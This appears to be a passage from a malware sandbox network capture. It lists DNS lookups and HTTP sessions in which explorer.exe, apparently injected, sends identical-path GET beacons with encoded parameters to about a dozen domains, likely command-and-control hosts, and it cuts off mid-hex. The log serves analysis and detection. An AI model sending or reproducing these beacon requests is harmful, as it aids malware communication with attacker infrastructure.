Apr 8, 2021 10:49:26.641731024 CEST	8.8.8.8	192.168.2.4	0x7985	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-dc11-60-177.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 10:49:26.641731024 CEST	8.8.8.8	192.168.2.4	0x7985	No error (0)	td-balancer-dc11-60-177.wixdns.net		185.230.60.177	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:32.013699055 CEST	8.8.8.8	192.168.2.4	0x2066	No error (0)	www.dottproject.com		91.195.240.94	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:37.457993031 CEST	8.8.8.8	192.168.2.4	0xd1cc	No error (0)	www.qcmax.com		104.128.125.95	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:43.182207108 CEST	8.8.8.8	192.168.2.4	0xb0a5	No error (0)	www.playfulpainters.com	playfulpainters.com		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 10:49:43.182207108 CEST	8.8.8.8	192.168.2.4	0xb0a5	No error (0)	playfulpainters.com		34.102.136.180	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:48.366859913 CEST	8.8.8.8	192.168.2.4	0x3e76	No error (0)	www.autobrehna.com		62.116.130.8	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:53.884182930 CEST	8.8.8.8	192.168.2.4	0x150f	Name error (3)	www.nagoyadoori.xyz	none	none	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:59.359829903 CEST	8.8.8.8	192.168.2.4	0xbcda	No error (0)	www.appgusher.com		156.254.221.72	A (IP address)	IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST	8.8.8.8	192.168.2.4	0x6686	No error (0)	www.thesixteenthround.net	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST	8.8.8.8	192.168.2.4	0x6686	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST	8.8.8.8	192.168.2.4	0x6686	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST	8.8.8.8	192.168.2.4	0x6686	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST	8.8.8.8	192.168.2.4	0x6686	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST	8.8.8.8	192.168.2.4	0x6686	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST	8.8.8.8	192.168.2.4	0x6686	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Apr 8, 2021 10:50:05.634023905 CEST	8.8.8.8	192.168.2.4	0x6686	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.biehnrecords.com

www.bedpee.com

www.pmrack.com

www.serversexposed.com

www.heliumhubs.com

www.420vaca.com

www.shujahumayun.com

www.dottproject.com

www.qcmax.com

www.playfulpainters.com

www.autobrehna.com

www.appgusher.com

www.thesixteenthround.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49734	184.168.131.241	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:48:49.778557062 CEST	1389	OUT	GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=Nog7saUMDwoWD2E1asrlCYsF2JarF3pmjxpXcoGpoLe9R6S6cRBIZYNmkdpvudxvP9hF HTTP/1.1 Host: www.biehnrecords.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:48:49.956664085 CEST	1389	IN	HTTP/1.1 502 Bad Gateway Server: nginx/1.16.1 Date: Thu, 08 Apr 2021 08:48:49 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49737	13.248.216.40	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:48:55.129555941 CEST	1438	OUT	GET /aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 Host: www.bedpee.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:48:55.307358027 CEST	1438	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Thu, 08 Apr 2021 08:48:55 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49770	62.116.130.8	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:49:48.392472029 CEST	6753	OUT	GET /aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 Host: www.autobrehna.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:49:48.428760052 CEST	6754	IN	HTTP/1.1 200 OK Date: Thu, 08 Apr 2021 08:49:48 GMT Server: Apache Content-Type: text/html; charset=UTF-8 X-Varnish: 494633303 Age: 0 X-redirector: MTk4MzEyMjYK Accept-Ranges: bytes Content-Length: 160 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 72 6f 64 75 6b 74 65 2e 77 65 62 2e 64 65 2f 68 6f 6d 65 70 61 67 65 2d 75 6e 64 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://produkte.web.de/homepage-und-mail/homepage-parken/"></frameset></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49773	156.254.221.72	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:50:00.378705978 CEST	6782	OUT	GET /aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 Host: www.appgusher.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:50:00.575277090 CEST	6783	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Apr 2021 08:50:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49777	198.54.117.215	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:50:05.817534924 CEST	6822	OUT	GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 HTTP/1.1 Host: www.thesixteenthround.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49742	135.181.58.27	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:49:05.675004959 CEST	5711	OUT	GET /aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 Host: www.pmrack.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:49:05.732119083 CEST	5711	IN	HTTP/1.1 404 Not Found Date: Thu, 08 Apr 2021 08:49:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 276 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 6d 72 61 63 6b 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.pmrack.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49743	64.32.22.102	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:49:10.974932909 CEST	5712	OUT	GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe HTTP/1.1 Host: www.serversexposed.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:49:11.139461040 CEST	5713	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Thu, 08 Apr 2021 08:49:11 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://www.serversexposed.com?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49755	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:49:16.207128048 CEST	6552	OUT	GET /aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 Host: www.heliumhubs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:49:16.320554018 CEST	6564	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 08 Apr 2021 08:49:16 GMT Content-Type: text/html Content-Length: 275 ETag: "606abe3b-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49758	64.190.62.111	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:49:21.406011105 CEST	6616	OUT	GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 HTTP/1.1 Host: www.420vaca.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:49:21.577060938 CEST	6618	IN	HTTP/1.1 200 OK date: Thu, 08 Apr 2021 08:49:21 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_fteCuN7zifjw7YmqDHya0DQktJuzr3+6SGxT4o3L6CSw/H/XGkvgjhRHsCrtuUC+0ObvmBF8/Ib+gwgpsFvYlg== last-modified: Thu, 08 Apr 2021 08:49:21 GMT x-cache-miss-from: parking-6dfcfcdcd9-bqj82 server: NginX connection: close Data Raw: 32 44 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 66 74 65 43 75 4e 37 7a 69 66 6a 77 37 59 6d 71 44 48 79 61 30 44 51 6b 74 4a 75 7a 72 33 2b 36 53 47 78 54 34 6f 33 4c 36 43 53 77 2f 48 2f 58 47 6b 76 67 6a 68 52 48 73 43 72 74 75 55 43 2b 30 4f 62 76 6d 42 46 38 2f 49 62 2b 67 77 67 70 73 46 76 59 6c 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 32 30 76 61 63 61 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 44 69 65 73 65 20 57 65 62 73 69 74 65 20 73 74 65 68 74 20 7a 75 6d 20 56 65 72 6b 61 75 66 21 26 6e 62 73 70 3b 2d 26 6e 62 73 70 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 7a 75 6d 20 54 68 65 6d 61 20 77 65 65 64 20 66 72 69 65 6e 64 6c 79 20 74 72 61 76 65 6c 20 34 32 30 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 69 65 73 65 20 57 65 62 73 69 74 65 20 73 74 65 68 74 20 7a 75 6d 20 56 65 72 6b 61 75 66 21 20 34 32 30 76 61 63 61 2e 63 6f 6d 20 69 73 74 20 64 69 65 20 62 65 73 74 65 20 51 75 65 6c 6c 65 20 66 c3 bc 72 20 61 6c 6c 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 64 69 65 20 53 69 65 20 73 75 63 68 65 6e 2e 20 56 6f 6e 20 61 6c 6c 67 65 6d 65 69 6e 65 6e 20 54 68 65 6d 65 6e Data Ascii: 2DE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_fteCuN7zifjw7YmqDHya0DQktJuzr3+6SGxT4o3L6CSw/H/XGkvgjhRHsCrtuUC+0ObvmBF8/Ib+gwgpsFvYlg==><head><meta charset="utf-8"><title>420vaca.com -&nbspDiese Website steht zum Verkauf! -&nbspInformationen zum Thema weed friendly travel 420.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="Diese Website steht zum Verkauf! 420vaca.com ist die beste Quelle fr alle Informationen die Sie suchen. Von allgemeinen Themen
Apr 8, 2021 10:49:21.577083111 CEST	6618	IN	Data Raw: 20 62 69 73 20 68 69 6e 20 7a 75 20 73 70 65 7a 69 65 6c 6c 65 6e 20 53 61 63 68 76 65 72 68 61 6c 74 65 6e 2c 20 66 69 6e 64 65 6e 0d 0a Data Ascii: bis hin zu speziellen Sachverhalten, finden
Apr 8, 2021 10:49:21.577095985 CEST	6619	IN	Data Raw: 35 36 43 0d 0a 20 53 69 65 20 61 75 66 20 34 32 30 76 61 63 61 2e 63 6f 6d 20 61 6c 6c 65 73 2e 20 57 69 72 20 68 6f 66 66 65 6e 2c 20 64 61 73 73 20 53 69 65 20 68 69 65 72 20 64 61 73 20 47 65 73 75 63 68 74 65 20 66 69 6e 64 65 6e 21 22 3e 3c Data Ascii: 56C Sie auf 420vaca.com alles. Wir hoffen, dass Sie hier das Gesuchte finden!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> /*! normalize.css v7.0.0 \|
Apr 8, 2021 10:49:21.577105999 CEST	6619	IN	Data Raw: 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 0d 0a Data Ascii: on,input{overflow:visible}button,select{text-transform:
Apr 8, 2021 10:49:21.577260017 CEST	6621	IN	Data Raw: 31 30 34 34 0d 0a 6e 6f 6e 65 7d 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 2c 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 2c 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 Data Ascii: 1044none}button,html [type="button"],[type="reset"],[type="submit"]{-webkit-appearance:button}button::-moz-focus-inner,[type="button"]::-moz-focus-inner,[type="reset"]::-moz-focus-inner,[type="submit"]::-moz-focus-inner{border-style:none;pad
Apr 8, 2021 10:49:21.577286005 CEST	6622	IN	Data Raw: 68 65 61 64 65 72 5f 5f 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 32 35 70 78 20 61 75 74 6f 20 32 30 70 78 20 61 75 74 6f 3b 74 65 78 74 2d 61 Data Ascii: header__content{color:#717171}.container-content{margin:25px auto 20px auto;text-align:center;background:url("//img.sedoparking.com/templates/bg/arrows-1-colors-3.png") #FBFBFB no-repeat center top;background-size:100%}.container-content__cont
Apr 8, 2021 10:49:21.577311993 CEST	6623	IN	Data Raw: 2d 68 65 69 67 68 74 3a 31 38 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 74 65 78 74 Data Ascii: -height:18px;color:#000}.two-tier-ads-list__list-element-link{font-size:1.0em;text-decoration:underline;color:#0a48ff}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-
Apr 8, 2021 10:49:21.577328920 CEST	6624	IN	Data Raw: 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f Data Ascii: box__content{display:inline-block;font-family:arial, sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__inp
Apr 8, 2021 10:49:21.577351093 CEST	6625	IN	Data Raw: 35 36 43 0d 0a 75 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 62 75 74 74 6f 6e 7b 63 75 Data Ascii: 56Cut,.container-searchbox__button{border:0 none}.container-searchbox__button{cursor:pointer;font-size:12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer__content{d
Apr 8, 2021 10:49:21.577368975 CEST	6625	IN	Data Raw: 74 69 76 65 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 0d 0a Data Ascii: tive-text{margin-top:10px;margin-right:0px;margin-botto
Apr 8, 2021 10:49:21.577418089 CEST	6627	IN	Data Raw: 35 36 43 0d 0a 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 Data Ascii: 56Cm:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,0.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all 0.3s;-moz-transition:all 0.3s;t

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49759	185.230.60.177	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 10:49:26.760282993 CEST	6636	OUT	GET /aqu2/?mbyD=KqXpoBRkSkhIKFWf0/hcWEBIf2LJNQsM+D3z3wmjuC1NFHENbZKDXJc64HLZauRofodl&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 Host: www.shujahumayun.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 10:49:26.951628923 CEST	6638	IN	HTTP/1.1 404 Not Found Date: Thu, 08 Apr 2021 08:49:26 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-wix-request-id: 1617871766.8235547367513413022 vary: Accept-Encoding Age: 0 X-Seen-By: 6ivkWfREES4Y8b2pOpzk7Owfbs+7qUVAqsIx00yI78k=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVivd4o9HMoDTVPhK7/s60Jl,m0j2EEknGIVUW/liY8BLLhe/Ft074qYAt5jyfc2Z/bHV0TBmJ+uLPQ4OZPC1VSMH,2d58ifebGbosy5xc+FRaljV3HpR8xZqSNZ1HRmu/MT7fb/McGpTYWlzKPcjCkEy/J+IxyhklpGfG6pTJrtUSeA==,2UNV7KOq4oGjA5+PKsX47Ay/vVeTGg75VNBOw8znOgAfbJaKSXYQ/lskq2jK6SGP,8Jozq2XDr5/0Pv3E0yMnd9NvNe0e540rcGIosj5ItuEaWyug/ZdHQ36uOAkr89T0,SN48OXVfD7mFj9SdiKQMqTAOhpQfuQfXExzNxffpiV1/AD/ma+Nc5exnexQxgiaz Server: Pepyaka/1.15.10 Data Raw: 62 39 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 